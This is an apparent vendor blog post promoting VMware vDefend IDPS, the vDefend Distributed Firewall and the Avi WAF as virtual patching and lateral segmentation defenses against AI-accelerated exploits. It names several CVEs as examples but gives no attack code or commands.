As the digital landscape enters the age of Artificial Intelligence, the traditional methods of securing applications are being fundamentally challenged. The emergence of advanced AI models has shifted the advantage towards attackers. With AI, even a novice attacker is now weaponized into a sophisticated hacker while operating semi-autonomously at very low cost, and unprecedented scale. Imagine the massive damage that ransomware gangs and/or nation-state actors could do with these cyber weapons. In recent times, ransomware attacks have led to business operations going offline for weeks and months, resulting in financial losses in hundreds of millions of dollars. To maintain a cyber resilient posture, organizations must move beyond reactive security and embrace a proactive defense-in-depth strategy centered on lateral security and virtual patching.
AI-discovered Tsunami of Exploits
Frontier AI models have the intelligence to identify unknown (zero day) software vulnerabilities (bugs) and find ways to exploit them faster than ever before. Attackers can leverage these exploits to infiltrate digital enterprises, propagate laterally, hopping and hunting, to find high value assets for ransom or for stealing secrets. They can initiate widespread, volumetric and/or targeted attacks semi-autonomously – leading to an exponential increase in the attack surface. “Security through obscurity” is no longer a viable cyber security strategy.
If enterprises can quickly patch software vulnerabilities, they can certainly reduce the risk of a breach and/or its spread. However, this is an extremely time consuming and resource intensive endeavor. There are thousands of software tools and apps, each with varied software versions, deployed on different types of hardware and operating systems and spread across multiple data centers. In larger organizations, “race to patch” can take weeks to months to roll out patches enterprise wide, leaving the organization exposed to infiltration, ransom and potentially business disruption.
To help quickly protect against this tsunami of exploits unleashed against workloads & apps and to buy down risk, enterprises need to focus on two key defenses for their private cloud workloads:
- Enable virtual patching using intrusion prevention systems and web application firewall
- Restrict propagation of attacks with lateral segmentation
What is Virtual Patching?
Virtual patching is a vulnerability-shielding tactic that protects assets by implementing a minimal layer of security policies at the network or application delivery level, front ending that asset. These measures intercept and block exploit attempts before they can reach the vulnerable software, effectively “patching” the flaw in the communication path rather than the software itself.
Key Benefits of Virtual Patching
- Application availability: Ensures that applications/assets are available while the risks are mitigated
- No code changes: It protects applications without requiring deployment of updated software/patches. Software patches can introduce regressions: this approach eliminates that risk
- Targeted signatures: Reduces the risk of false positives and performance impact
- Zero-Day Protection: Provides a rapid response to vulnerabilities for which no official patch yet exists.
- Legacy Support: Shields older, unsupported systems that are still critical to business operations. Patches may not even exist for legacy applications
- Buys Time: Grants security teams the necessary cycles to test and deploy permanent vendor patches without remaining exposed
- Helps with Compliance: Many regulations such as PCI-DSS and HIPAA, require timely deployment of security controls to remain compliant
vDefend Distributed IDPS: Hypervisor-embedded Virtual Patching
VMware vDefend provides a revolutionary approach to virtual patching of workloads by integrating security directly into the VMware Cloud Foundation (VCF) hypervisor fabric. The vDefend IDPS (Intrusion Detection and Prevention System) is applied directly to the vNIC of every workload, enabling deep, granular inspection of application traffic (every packet) moving across the VCF private cloud, specifically targeting network-layer exploits and lateral movements.
How vDefend IDPS Enables Virtual Patching
- Hypervisor-Integrated Inspection: vDefend’s Distributed IDPS inspects network traffic at the vNIC of every VCF workload. This ensures unpatched servers cannot be exploited by attacks originating from the outside or from inside the network.
- Automated dynamic policies: Run a vulnerability scan to identify workloads, apply appropriate tags and create a virtual patching policy with a limited set of IDPS signatures. As new vulnerable workloads are identified and tagged, the policies are applied automatically and vulnerable workloads get immediate protection.
- East-West Security: IDPS prevents attackers from exploiting vulnerabilities to move laterally within the environment (and eventually compromising high-value assets).
Examples of Vulnerabilities Protection
- Moveit Transfer Auth Bypass (CVE-2024-5806): This flaw in the SFTP module of Moveit Transfer allowed attackers to bypass authentication and steal files without a password. vDefend can detect the “insufficient validation” logic patterns during the initial connection phase and stop the attack in it’s tracks.
- Ni8mare (CVE-2026-21858): This unauthenticated RCE flaw in the n8n automation platform allows attackers to achieve full system takeover via “Content-Type confusion.” vDefend identifies these malformed JSON payloads and malicious header mismatches, blocking the exploit before an attacker can hijack internal workflows to move laterally through the data center.
- Log4Shell (CVE-2021-44228): vDefend IDPS can detect and prevent against attempts at exploiting the Log4shell vulnerability. This exploit, residing in the Java Naming and Directory Interface (JNDI), can download malicious scripts and perform remote code execution, allowing full control of the targeted system. (Demo: Protecting against Log4Shell with VMware vDefend ATP)
The vDefend Advantage: What makes vDefend IDPS powerful for this use case is its architectural advantage, signature strategy, and operational simplicity.
- Speed matters in the era of AI-driven threats. vDefend’s built-in closed-loop security architecture — through integration with the VCF private cloud platform — delivers detection as well as rapid mitigation, thus dramatically reducing attacker dwell time.
- vDefend IDPS supports IDPS signatures that are frequently updated (multiple times a day), ensuring protection against the latest global threats. Broadcom has a threat intelligence team that actively analyzes new exploits, creates signatures, and updates the signature bundles (see IDPS signature portal)
- Furthermore, IDPS supports custom IDPS signatures: customers can import trusted signatures from third-parties or develop in-house to virtually patch their applications. This provides a truly bespoke security posture.
vDefend Distributed Firewall: Restrict Unauthorized Lateral Propagation
To further restrict lateral propagation of threats, vDefend also provides a high-performance hypervisor-embedded Layer-7 Distributed Firewall (DFW). It allows comprehensive lateral segmentation of VCF workloads through highly streamlined context (or tag) based security policies. Lateral segmentation includes both macro and micro-segmentation, applied to ensure trusted (least-privileged) access to infrastructure services, environments (or zones), and applications. DFW is fully scale-out, eliminates traffic tromboning and the need for network changes (unlike traditional firewalls), and preserves the segmentation posture during vMotion events. It also includes a built-in prescriptive deployment tool, DFW 1-2-3-4 (blog), enabling rapid self-deployment across all workloads in as little as a few weeks.
Avi Web Application Firewall: Virtual Patching for Web Applications
While vDefend secures the internal network, the Avi Web Application Firewall (WAF) acts as the first line of defense for web-facing applications, providing virtual patching at the web layer.
How Avi WAF Prevents Exploitation
- Edge Defense: Avi WAF analyzes incoming north-south traffic, identifying and neutralizing OWASP Top 10 threats before they reach the application.
- Protocol-Aware Inspection: Its robust HTTP/HTML parser understands complex protocol features, ensuring that even obfuscated exploit attempts are caught within the application payload.
Examples of Vulnerabilities Protection
- SQL Injection (SQLi): Avi WAF virtually patches vulnerable databases by stripping malicious SQL commands from web entry fields. An example is CVE-2025-31044 in the Premium SEO Pack plugin of WordPress. Avi uses a pipeline-based security model to provide protection against SQLi at different stages of the incoming traffic.
- Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) : Avi WAF’s built-in CSRF (Cross-Site Request Forgery Protection) prevents attackers from injecting client-side scripts into web pages by sanitizing incoming requests. For example, Avi protects against the MCP inspector tool vulnerability (CVE-2025-49596) that exposes a new class of browser-based attacks against AI developer tools.
- React2shell (CVE-2025-55182): Avi WAF blocks Remote Code Execution (RCE) attempts like Command Injection, Application Language Specific attacks, and also blocks attempts to include remote files (RFI) or local system files (LFI) that could lead to attackers to execute arbitrary commands on application server.
Avi WAF for Vulnerability Scanner to further Virtual Patching: Avi WAF provides an inbuilt SDK that can import Dynamic Application Security Testing (DAST) scanner results to construct the customized WAF policy to protect the application from security threats found by the scanner. Avi WAF supports Qualys Web App Scanning and OWASP ZAP Attack Proxy DAST scanner results.
The Avi Advantage: Key differentiators for Avi WAF are its software-defined architecture, scale-out and full access to the Avi customer base.
- Unlike alternative WAF solutions that require a separate, expensive license, Avi WAF is available to all Avi customers as part of the Avi license. Essentially every Avi Load Balancer customer also has the built-in capability to secure their web applications by default.
- Avi is also fully integrated with VCF, thus delivering plug-and-play operational experience and self-service load balancing and WAF – for both VM and Kubernetes (VMware Kubernetes Service – VKS) workloads.
Conclusion
In the era of AI-accelerated threat landscape, the “race to patch” has reached a breaking point. Organizations can no longer rely solely on eventual roll-out of code updates to stay secure. By leveraging vDefend Distributed IDPS for lateral virtual patching, vDefend DFW for lateral segmentation and Avi WAF for web application security, enterprises can implement a comprehensive private cloud cyber defense strategy. This multi-layered approach provides an immediate and comprehensive defense that blocks hackers from exploiting vulnerabilities, buying the IT team the critical time needed to maintain long-term application integrity.
